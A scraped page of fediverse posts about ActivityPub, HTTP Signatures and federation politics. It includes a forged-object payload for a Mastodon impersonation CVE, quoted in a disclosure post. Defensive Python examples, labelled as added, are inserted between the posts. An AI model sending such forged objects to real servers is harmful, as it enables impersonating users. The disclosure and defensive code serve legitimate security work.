Notices by arcanicanis (arcanicanis@were.social), page 3

  1. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Friday, 16-Feb-2024 01:19:14 JST arcanicanis arcanicanis

    So here’s an example of one of the maliciously-crafted payloads that resulted in a 9.8 severity CVE (CVE-2024-23832) against Mastodon:

    {
      "@context": ["https://www.w3.org/ns/activitystreams"],
      "id": "https://mastodon.social/users/Gargron/posts/123456",
      "type": "Note",
      "actor": "https://mastodon.social/users/Gargron",
      "attributedTo": "https://mastodon.social/users/Gargron",
      "content": "Well, this is an extremely concerning vulnerability I should have accounted for.",
      "to": ["https://www.w3.org/ns/activitystreams#Public"],
      "cc": ["https://mastodon.social/users/Gargron/followers"],
      "published": "2024-01-28T22:00:00Z"
    }

    I have previously double-checked with one of the Mastodon developers (while CC’ing the Mastodon Security email) to confirm that I’m free to release the details at this scheduled time (Feb 15th 15:00 UTC). According to the current observed metrics on FediDB, >73.6% of Mastodon instances are patched against CVE-2024-23832, as manually tabulated.

    For more details on the vulnerability, the original security report as it was submitted on Github is available at: https://arcanican.is/excerpts/cve-2024-23832/

    My recount of events (as well as unsolicited commentary and criticisms on the vulnerability, ecosystem, etc; when I get around to finishing it): https://arcanican.is/excerpts/cve-2024-23832/discovery.htm

    In conversation about a year ago from were.social permalink

    Attachments

    1. Eugen (@Gargron@mastodon.social): 72.7K Posts, 320 Following, 211K Followers · Founder, CEO and lead developer @Mastodon, Germany.
    2. https://were.social/media/6ff54bdc52e5011feb9b11a715a0e4206060a10b523d864814345a3fc7f9734c.png
    3. https://were.social/media/c0bf24a97dec84fbbc9c22244334160c7b056d29b03ab180bae6d2bb57455441.png
    4. Mastodon: 76.1K Posts, 512 Following, 344K Followers · Founder of @Mastodon. Film photography, prog metal, Dota 2.
    5. Remote User Impersonation and Takeover via Cache Poisoning
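The advisory linked above is titled "Remote User Impersonation and Takeover via Cache Poisoning"; the receiving side's defence against an object like the one quoted is to refuse to process or cache it under an origin other than the one that authenticated the delivery. The following Python check is an added example, not code from the post, from Mastodon or from the linked report; the delivering-actor URL and the other.example host are constructed assumptions.

```python
from urllib.parse import urlsplit

# Properties that name an actor or object by URL; each must share an origin with
# whoever actually delivered (or served) the object.
ORIGIN_BOUND = ("id", "actor", "attributedTo")


def origin_of(url):
    """Return 'https://host' for an absolute https URL, else None."""
    if not isinstance(url, str):
        return None
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.netloc:
        return None
    return "https://" + parts.netloc.lower()


def origin_problems(obj, delivered_by, path=""):
    """List every origin mismatch in obj, recursing into an embedded object.

    delivered_by is the URL of the actor whose HTTP Signature authenticated the
    inbox delivery, or the URL the object was fetched from. An empty list means
    the object may be processed and cached under the id it claims.
    """
    trusted = origin_of(delivered_by)
    if trusted is None:
        return [f"delivering party {delivered_by!r} has no valid https origin"]
    problems = []
    for prop in ORIGIN_BOUND:
        value = obj.get(prop)
        if value is None:
            continue
        # actor/attributedTo may be embedded as an object rather than a bare URL.
        ref = value.get("id") if isinstance(value, dict) else value
        if origin_of(ref) != trusted:
            problems.append(f"{path}{prop}={ref!r} is not from {trusted}")
    inner = obj.get("object")  # e.g. the Note inside a Create
    if isinstance(inner, dict):
        problems.extend(origin_problems(inner, delivered_by, path + "object."))
    return problems


def should_accept(obj, delivered_by):
    """True only when nothing in obj claims an origin the deliverer cannot vouch for."""
    return not origin_problems(obj, delivered_by)


# Constructed input: the payload quoted in the post above, as it would arrive in
# an inbox. Who delivered it is what decides whether it is accepted.
CLAIMED_NOTE = {
    "@context": ["https://www.w3.org/ns/activitystreams"],
    "id": "https://mastodon.social/users/Gargron/posts/123456",
    "type": "Note",
    "actor": "https://mastodon.social/users/Gargron",
    "attributedTo": "https://mastodon.social/users/Gargron",
    "content": "Well, this is an extremely concerning vulnerability I should have accounted for.",
    "to": ["https://www.w3.org/ns/activitystreams#Public"],
    "cc": ["https://mastodon.social/users/Gargron/followers"],
    "published": "2024-01-28T22:00:00Z",
}

if __name__ == "__main__":
    # Hypothetical third-party deliverer (other.example): every origin-bound property is rejected.
    for sender in ("https://other.example/users/someone", "https://mastodon.social/users/Gargron"):
        verdict = "accept" if should_accept(CLAIMED_NOTE, sender) else origin_problems(CLAIMED_NOTE, sender)
        print(sender, "->", verdict)
```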
  2. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 09:52:02 JST arcanicanis arcanicanis
    in reply to
    • Daemionfox

    An Accept can be as simple as (have a Follow activity as the object field):

    {
      "@context": ["https://www.w3.org/ns/activitystreams"],
      "type": "Accept",
      "actor": "https://example.social/users/subscriber",
      "to": ["https://fedi.example/users/poster"],
      "object": {
        "type": "Follow",
        "actor": "https://fedi.example/users/poster",
        "object": "https://example.social/users/subscriber"
      }
    }

    For the best case, you can just copy the whole Follow activity into the ‘object’ field; meanwhile just referencing the activity ID of the Follow alone would be insufficient.

    In conversation about a year ago from were.social permalink
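Both halves of that handshake, as an added example that is not code from the post or from any fedi implementation: the followed side builds an Accept that embeds the complete Follow, and the following side matches an inbound Accept against the Follows it has pending. The activity ids under fedi.example and example.social are constructed.

```python
import copy

AS2_CONTEXT = ["https://www.w3.org/ns/activitystreams"]


def build_accept(follow, accept_id):
    """Build the Accept that the followed actor (follow['object']) sends back.

    accept_id is the URL the accepting server assigns to the new activity.
    The whole Follow is copied into 'object': an id alone would leave the
    recipient nothing to compare against without a second fetch.
    """
    if follow.get("type") != "Follow":
        raise ValueError("can only accept a Follow activity")
    for key in ("actor", "object"):
        if not isinstance(follow.get(key), str):
            raise ValueError(f"Follow is missing a string {key!r}")
    return {
        "@context": AS2_CONTEXT,
        "id": accept_id,
        "type": "Accept",
        "actor": follow["object"],        # the actor that was followed accepts
        "to": [follow["actor"]],          # ... addressed to the follower
        "object": copy.deepcopy(follow),  # the full Follow, not just its id
    }


def match_accept(accept, pending, me):
    """Return the id of the pending Follow that this Accept confirms, or None.

    pending maps Follow id -> Follow activity we sent earlier; me is our actor
    URL. Anything that does not line up (wrong type, a Follow we never sent,
    an accepter other than the actor that Follow targeted) is ignored.
    """
    inner = accept.get("object")
    if accept.get("type") != "Accept" or not isinstance(inner, dict):
        return None  # a bare Follow id in 'object' gives nothing to check
    if inner.get("type") != "Follow" or inner.get("actor") != me:
        return None
    if inner.get("object") != accept.get("actor"):
        return None  # only the followed actor may accept
    inner_id = inner.get("id")
    if inner_id is not None:
        candidates = [pending[inner_id]] if inner_id in pending else []
    else:  # Follow copied without its id: fall back to the (actor, object) pair
        candidates = list(pending.values())
    for follow in candidates:
        if follow["actor"] == me and follow["object"] == accept["actor"]:
            return follow["id"]
    return None


# Constructed sample using the two actors from the post above.
POSTER = "https://fedi.example/users/poster"
SUBSCRIBER = "https://example.social/users/subscriber"
FOLLOW = {
    "@context": AS2_CONTEXT,
    "id": "https://fedi.example/activities/follow-1",
    "type": "Follow",
    "actor": POSTER,
    "object": SUBSCRIBER,
}
ACCEPT = build_accept(FOLLOW, "https://example.social/activities/accept-1")

if __name__ == "__main__":
    print(match_accept(ACCEPT, {FOLLOW["id"]: FOLLOW}, POSTER))
```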

  3. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 07:40:31 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • PC-9801 Enjoyer
    • Sprate

    What I’m more curious of is someone reimplementing the whole stack on their own, from the provided documentation only, and not just copycatting undocumented behavior from source code of the sample implementation. I don’t consider anything an open standard until there’s at least two independent [client and server] implementations of it.

    In conversation about a year ago from were.social permalink
  4. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 06:19:46 JST arcanicanis arcanicanis
    in reply to
    • PC-9801 Enjoyer
    • :blank:
    • Lexxy 🦊

    https://www.w3.org/TR/activitypub/#block-activity-outbox

    The Block activity is used to indicate that the posting actor does not want another actor (defined in the object property) to be able to interact with objects posted by the actor posting the Block activity.

    In the ActivityPub spec itself, it bears no meaning of access control; it’s purely just to ignore notifications and objects (such as replies) from that actor, as there is no rational way to accomplish limiting access to public posts from specific actors.

    Anything sensitive that requires access control should not be posted publicly on social media to begin with. This isn’t a software design issue, it’s a human behavioral issue.

    I routinely [privately] warn people about oversharing, such as when I stumble across someone posting a photo that gives away the exact location of where they live, or where they work, and most of the time it’s shrugged off as a non-issue, because they assume they have no tangible threats in the present, but never consider the future.

    Then of course, they could always end up in some controversy much later on, over something completely innocuous, and face some tangible threats/risk, but yet put the blame on everyone else for their reckless posting behaviors (“omg doxxing!”). Blocking people they perceive as a threat solves nothing.

    In conversation about a year ago from were.social permalink

    Attachments

    1. ActivityPub (www.w3.org): The ActivityPub protocol is a decentralized social networking protocol based upon the [ActivityStreams] 2.0 data format. It provides a client to server API for creating, updating and deleting content, as well as a federated server to server API for delivering notifications and content.

  5. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Tuesday, 13-Feb-2024 01:42:33 JST arcanicanis arcanicanis
    in reply to
    • Hyolobrika
    • :verified_2:防空識別區𝒔𝒐𝒄𝟶

    The reason I think ‘federated’ has much more practicality, is because it’s far easier to conceptualize, establish responsibility of who pays the bills for running the servers, easier to locate a resource (if it uses some conventional identifier, like a URL), etc.

    Whereas with “truly decentralized mesh, everything is a node, no distinction of client/server”: usually some entity still has to pick up the slack and host high-bandwidth/high-uptime nodes, or seed a sizable portion of the network (if storage focused), or centrally run some ‘jumpstart’ servers (to be a new node’s first peer, to discover the rest of the network to peer with) for the network, entirely as some cash-furnace charity.

    As it is with Tor, I have no idea where it’d be if it was without a few of its top exit node providers, since there’s virtually no incentive to ever host an exit node: https://metrics.torproject.org/bubbles.html#as-exits-only

    The only model that I think anything ‘truly decentralized’ would be self-sustaining is if it involves some autonomous cryptocurrency-based concept, but that also adds more cost and overhead (including blockchain, consensus, etc), and I assume it’s also difficult to design a system that provably measures resource costs (such as rewarding someone for hosting a resource, providing bandwidth, etc).

    It feels like everyone always tiers the concepts strictly into (from worst to inherently best): centralized, federated, decentralized mesh; always striving for decentralized mesh as ‘the Holy Grail’, always better above-all. It’s seldom viewed instead where there’s tradeoffs between federated and decentralized.

    Also instead of having to combine decentralization all into one application protocol, sometimes it’s better just being left as an external responsibility of an underlying network; in other words, just take what we already have, and combine them together: host a single-user fedi instance on Tor, I2P, or some other overlay encrypted meshnet, and you get some of the bonuses without having to invent a whole new protocol and whole new suite of cross-platform client/node software (which can take YEARS to iron out).

    In conversation about a year ago from were.social permalink

    Attachments

    1. Servers – Tor Metrics (metrics.torproject.org)
  6. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Monday, 12-Feb-2024 21:51:02 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason

    The reality that disgusts me the most, is with the cargo culted mentality of:

    Software is now (rightfully) considered so dangerous that we tell everyone not to run it themselves. Instead, you are supposed to leave that to an “X as a service” provider, or perhaps just to “the cloud.” (…)

    The assumption is then that the cloud is somehow able to make insecure software trustworthy. (…)

    Specifically where you have retards that made the mistake of running their company IT almost exclusively on Microsoft products, especially with Exchange, SharePoint, and such; that they figure it’s “safer” if you just have Microsoft host all of it instead. Instead of: just using something else, with a better security history.

    It even blows my mind further with teleconferencing software; like paying an O365 subscription for Teams, as if WebRTC is a finite resource you can only get from Microsoft and can’t run yourself.

    So now a lot of it’s just a capture of so much internal company data and infra all onto Azure/O365, making all these customers as Microsoft’s most favorite little captive victims.

    Hell, even the f’ing military (when I was in my last few months of doing ActiveDirectory/Exchange admin stuff in the Marine Corps, to the end of my contract) was in the transition of dumping all their internal servers for Exchange Online and O365, whereas all of that’s outside of the intranet perimeter now.

    In conversation about a year ago from were.social permalink

  7. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Monday, 12-Feb-2024 14:07:47 JST arcanicanis arcanicanis

    https://spectrum.ieee.org/lean-software-development

    In conversation about a year ago from were.social permalink

    Attachments

    1. Why Bloat Is Still Software’s Biggest Vulnerability: A 2024 plea for lean software (spectrum.ieee.org)
  8. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 18:44:16 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • Matt Hamilton

    I mean, HTTP Signatures wasn’t very hard to implement and get working fine and interoperable with other fedi software, and I’ve read portions of the [draft] spec, it’s just not anything usable as a format of portable data that could be relayed between servers. You just also have to check with implementations of what headers they expect to be signed, which is part of the unwritten rules in fedi that you’re not going to find in the HTTP Signatures spec itself.

    But if you want to find endless rabbit holes of practically “protocol mills” (if that’s an appropriate moniker?), just dig into some of the distant depths of the Verifiable Credentials suite of standards, or for insane extremes, go through the labyrinth of specs for Solid: https://solidproject.org/TR/

    Apparently they even define their own system of HTTP Signatures: https://solid.github.io/httpsig/

    depend on the N3 language for manipulating data: https://solidproject.org/TR/protocol#n3-patch-example

    https://w3c.github.io/N3/spec/

    But outside of the topic of Solid, and as mentioned earlier: at least some parts of Verifiable Credentials can be borrowed into fedi, and narrowly implemented for a specific opinionated use, such as object signatures, as I’ve described in: https://arcanican.is/primer/ap-decentralization.php

    But yes, there’s just insane degrees and extents in which people just keep dreaming up new standards, and making things unfathomably more complex than needed, likely just to sell consultancy and to pitch more VC startups.

    In conversation about a year ago from were.social permalink

    Attachments

    1. Solid Protocol

  9. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 18:21:27 JST arcanicanis arcanicanis
    in reply to
    • silverpill

    I guess I notice one typo in the proposed FEP: it’s (created) not (created-at), I hope that typo doesn’t stick.

    In conversation about a year ago from were.social permalink
  10. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 12:54:49 JST arcanicanis arcanicanis
    in reply to
    • Matt Hamilton

    This is with an implementation of HTTP Signatures in fedi. Just as I was looking into someone asking help on implementing HTTP Signatures, I notice the library they pull in doesn’t even validate the digest, just if the signature is valid and nothing else.

    This is also why I hate the mentality of “well, surely other people out there are more responsible and educated than me on this domain-specific knowledge, so I’ll just import this random library that seems popular enough”.

    In conversation about a year ago from were.social permalink
  11. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 12:45:48 JST arcanicanis arcanicanis

    Did you know: when you verify the signature on a digest, you should probably verify that the presented content (that the digest is supposedly of) actually hashes to the same value as the signed digest?

    I’m just increasingly disgusted that it seems like the majority of developers are just collectively drugged, high, intoxicated, or some combination thereof, because I don’t understand how I keep stumbling into these things when I’m not even trying to pentest anything. Worse is that this is in a library that people are just blindly importing and trusting.

    In conversation about a year ago from were.social permalink
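The check this post (and the previous one) says was missing, as an added example that is not code from the post or from the library it refers to: an HTTP Signature in fedi covers the Digest header, not the body, so a verifier must re-hash the body it actually received and compare it with the signed digest, and must also require that Digest is among the signed headers. Key lookup and the RSA verification itself are left to a boolean input; the request body and headers are constructed.

```python
import base64
import hashlib
import hmac

# RFC 3230 digest tokens we accept; MD5 and SHA-1 are deliberately absent.
DIGEST_ALGORITHMS = {"sha-256": hashlib.sha256, "sha-512": hashlib.sha512}


def parse_digest(header):
    """Parse 'SHA-256=<b64>, SHA-512=<b64>' into {algorithm: raw digest bytes}."""
    out = {}
    for item in header.split(","):
        algo, sep, value = item.strip().partition("=")
        if not sep:
            raise ValueError(f"malformed Digest entry: {item!r}")
        out[algo.strip().lower()] = base64.b64decode(value.strip(), validate=True)
    return out


def body_matches_digest(headers, body):
    """True iff a supported Digest entry equals the hash of the body actually received."""
    header = headers.get("digest")
    if header is None:
        return False  # without a digest the signature says nothing about the body
    try:
        presented = parse_digest(header)
    except ValueError:  # includes binascii.Error from bad base64
        return False
    for algo, expected in presented.items():
        fn = DIGEST_ALGORITHMS.get(algo)
        if fn is not None and hmac.compare_digest(fn(body).digest(), expected):
            return True
    return False


def signed_header_names(signature_header):
    """Return the header list from the headers="..." parameter of a Signature header."""
    for param in signature_header.split(","):
        key, _, value = param.strip().partition("=")
        if key.strip().lower() == "headers":
            return value.strip().strip('"').lower().split()
    return ["date"]  # draft-cavage default when the parameter is absent


def request_is_authentic(headers, body, signature_valid):
    """The three checks an inbox needs before trusting a signed POST body.
    signature_valid is the result of verifying the HTTP Signature over the
    listed headers with the sender's public key (done elsewhere)."""
    headers = {k.lower(): v for k, v in headers.items()}
    if not signature_valid:
        return False
    if "digest" not in signed_header_names(headers.get("signature", "")):
        return False  # an unsigned Digest header can be replaced along with the body
    return body_matches_digest(headers, body)


def make_digest_header(body):
    """Digest header value a sender attaches for body (SHA-256)."""
    return "SHA-256=" + base64.b64encode(hashlib.sha256(body).digest()).decode()


# Constructed request: headers as a sender would produce them, with a placeholder
# signature value (the real one would be RSA-SHA256 over the listed headers).
BODY = b'{"type":"Note","content":"hello"}'
HEADERS = {
    "Host": "fedi.example",
    "Date": "Sun, 11 Feb 2024 03:45:48 GMT",
    "Digest": make_digest_header(BODY),
    "Signature": 'keyId="https://example.social/users/subscriber#main-key",'
                 'algorithm="rsa-sha256",headers="(request-target) host date digest",'
                 'signature="PLACEHOLDER"',
}
```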
  12. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Friday, 09-Feb-2024 21:46:01 JST arcanicanis arcanicanis

    Why do we have both context (not to be confused with @context) and conversation? Is that another Mastodonism or Pleromaism? context is defined in the ActivityStreams vocabulary specification, while conversation is not. In production implementations, they seem to just reference the same value.

    It would have been nice to just have either of those resolve to a Collection of some sort, such as containing all the objects within that context, and instead of needing another property (replies) to be a little less redundant.

    In conversation about a year ago from were.social permalink

  13. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 07-Feb-2024 09:25:49 JST arcanicanis arcanicanis
    in reply to
    • Sexy Moon
    • p
    • p
    • silverpill

    There is an alternate proposal I have where you just wrap a DID-based variant inside of a standard AP object, using the parent object as an envelope, thus being able to support both as a transitory thing. It just makes it a bit more bloated/jank in appearance.

    Either way, I think there needs to be more people involved in the discussion, especially if there’s better ideas.

    In conversation about a year ago from were.social permalink
  14. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 31-Jan-2024 10:37:30 JST arcanicanis arcanicanis
    in reply to
    • william.maggos
    • ≠ Brett Stevens ≠
    • NETZSPHAERE DIES GOD LAUGHS

    I’ll throw a little fuel to the fire here: half this conversation is just invisible entirely to a reasonable portion of my followers, or even a significant amount of the fedi in general, because of fediblock antics.

    I recently even uncovered a very critical vulnerability in Mastodon a couple days ago, tried reporting it via email, didn’t have any response for at least 2 days, and would like to ping the respective developers on mastodon.social, but I can’t: because mastodon.social just abruptly blocked my server entirely some many months ago, without any report or warning, and I legitimately don’t know what it was over. (Sidenote: the report did finally get acknowledged and a patch is scheduled)

    And this is ironic because I’m not a very outspoken in-your-face debater, and rarely do I ever bring up partisan subjects. Because of fediblock, most people on this instance just dropped fedi entirely, or jumped to another server (and some even continue to keep server-hopping, just to inch around it). There’s one follower I believe that has jumped 5 servers now.

    The only post of mine that’s any semblance of controversial, despite trying to carefully address the subject with kid gloves and not leave room for any allusions is: https://were.social/notice/ATLhhFil4BF8VHsHNg

    The emphasis of the post is more on the subject of mental health, and the nature of information when dealing with someone in-person versus as a spectator online, and just by nature of it being about a trans person of something depicted in anything less than stellar, that it’s deemed “transphobic”. If that’s the thing to get a whole server banned (including by mastodon.social), then I don’t even know what degree of discourse can even be had. I don’t know what level of debate is even remotely possible anymore at this point, if people can’t handle sensitive subjects as these.

    In conversation about a year ago from were.social permalink

  15. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 31-Jan-2024 10:37:29 JST arcanicanis arcanicanis
    in reply to
    • william.maggos
    • arcanicanis
    • ≠ Brett Stevens ≠
    • NETZSPHAERE DIES GOD LAUGHS

    Further, just because of not blocking servers at the request of people that aren’t even users of this instance, and for engaging in discussions on “problematic” servers, I tally up 80 publicly published server rejects: https://fba.ryona.agency/?domain=were.social

    I have no account on KF, I never use KF, but just because I’ve replied to stuff on kiwifarms.cc (their fedi instance, which doesn’t even exist anymore; and not the forum that everyone keeps trying to shut down), that anyone on this server is now just globally a ‘bad person’ and ‘usual scum’ and written off entirely.

    Note that this list is only the public ones even. I’ve had connections to friends severed, where I can’t follow them anymore, because of their admin copy/pasting blocklists or just assuming I’m some insidious person just because of how broad of the types of people I’ll engage in conversation with.

    Hell, there’s also blocks just for the software used, because people have a brick up their butt over @alex, and many people cannot separate software from its developer, regardless of a software not being used to shove some political belief/ideology.

    There’s other instances that popped up, that I wanted to connect with more, but again: just because they used something that’s not Mastodon, such as: Misskey, Pleroma/Rebased (and/or Soapbox as a frontend) they started to face the absurdity of fediblock and just gave up. One of them was packetloss.social and that just disappeared entirely.

    In conversation about a year ago from were.social permalink

    Attachments

    1. fedi-block-api: were.social
  16. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 24-Jan-2024 02:09:06 JST arcanicanis arcanicanis

    “Enshittification” aka “I’m a moron that took the ‘always free’ bait of a VC startup, and act surprised every time when a service has to stop being a firepit of money, after startup funding runs out, and tries to squeeze money out of users that were expecting a perpetually free service; and instead of learning anything, I use a word to characterize platforms as being on an agenda of wanting to cripple/alienate users, and deflect responsibility for falling for the bait every time”

    In conversation about a year ago from were.social permalink
  17. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 14-Jan-2024 13:44:47 JST arcanicanis arcanicanis
    in reply to
    • iced depresso
    • arcanicanis

    I’m almost itched by this now: the lack of time and health as being finite values, unless they’re just hidden. But nonetheless, each action should decrement a theoretical value of time. Meanwhile other poor choices could decrement health. Ergo, someone could die younger than the ‘finite amount of time’ (aka max lifetime) by poor health choices (stress, emptiness, etc).

    In conversation about a year ago from were.social permalink
  18. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 14-Jan-2024 13:32:19 JST arcanicanis arcanicanis
    in reply to
    • iced depresso

    Guess I can’t advance beyond a teenager by focusing on working, learning, and friends (sometimes) somehow; and I guess trying to advance in career apparently makes you dumber.

    In conversation about a year ago from were.social permalink

    Attachments

    1. https://were.social/media/ab916b25a84d0836ca153c3dc0e9dd1354a5c117bf2d1d0821ef6a6713748578.png
  19. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Saturday, 13-Jan-2024 10:49:11 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • silverpill

    Wait, secp256k1 (as in Koblitz curve, as used in Bitcoin/Ethereum, only meant for a specific narrow use and supposedly has much more ways to be easily misused, making key compromise easier) versus P-256 (secp256r1) or the much simpler/performant Curve25519? Was there a reason for adopting specifically secp256k1 in Nostr above all others?

    In conversation about a year ago from were.social permalink
  20. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 10-Jan-2024 09:05:35 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason

    3,600,000,000 bytes / 86400 seconds (in a day) = 42kB/s, or ( * 8) 333kbps, enough for a very high bitrate audio stream.

    Semi-related: I remember once I was checking on a friend’s network for them, and in the router stats there was a device, a computer they don’t use for anything except watching the camera feeds on their LAN, downloading like +3TB/month (and a proportionate +3TB/month upload also, from a spread of devices).

    Invariably it was because they used the vendor’s (Amcrest) camera viewer software and set it up via their ‘cloud login’, and already had the IP cameras linked to his account (on previous setup), that when he added the cameras to the viewer, it was pulling them by proxy of the vendor’s TURN-like relay (despite being on the exact same network).

    When they removed the cameras, and then set it up through a separate flow by scanning the LAN only, and adding them by LAN IP directly, then it wasn’t feeding their whole damn household through an internet relay (which, I checked the IP, and not even the vendor runs it, they outsource it to some other company to provide it).

    In conversation about a year ago from were.social permalink
          GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

          Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.
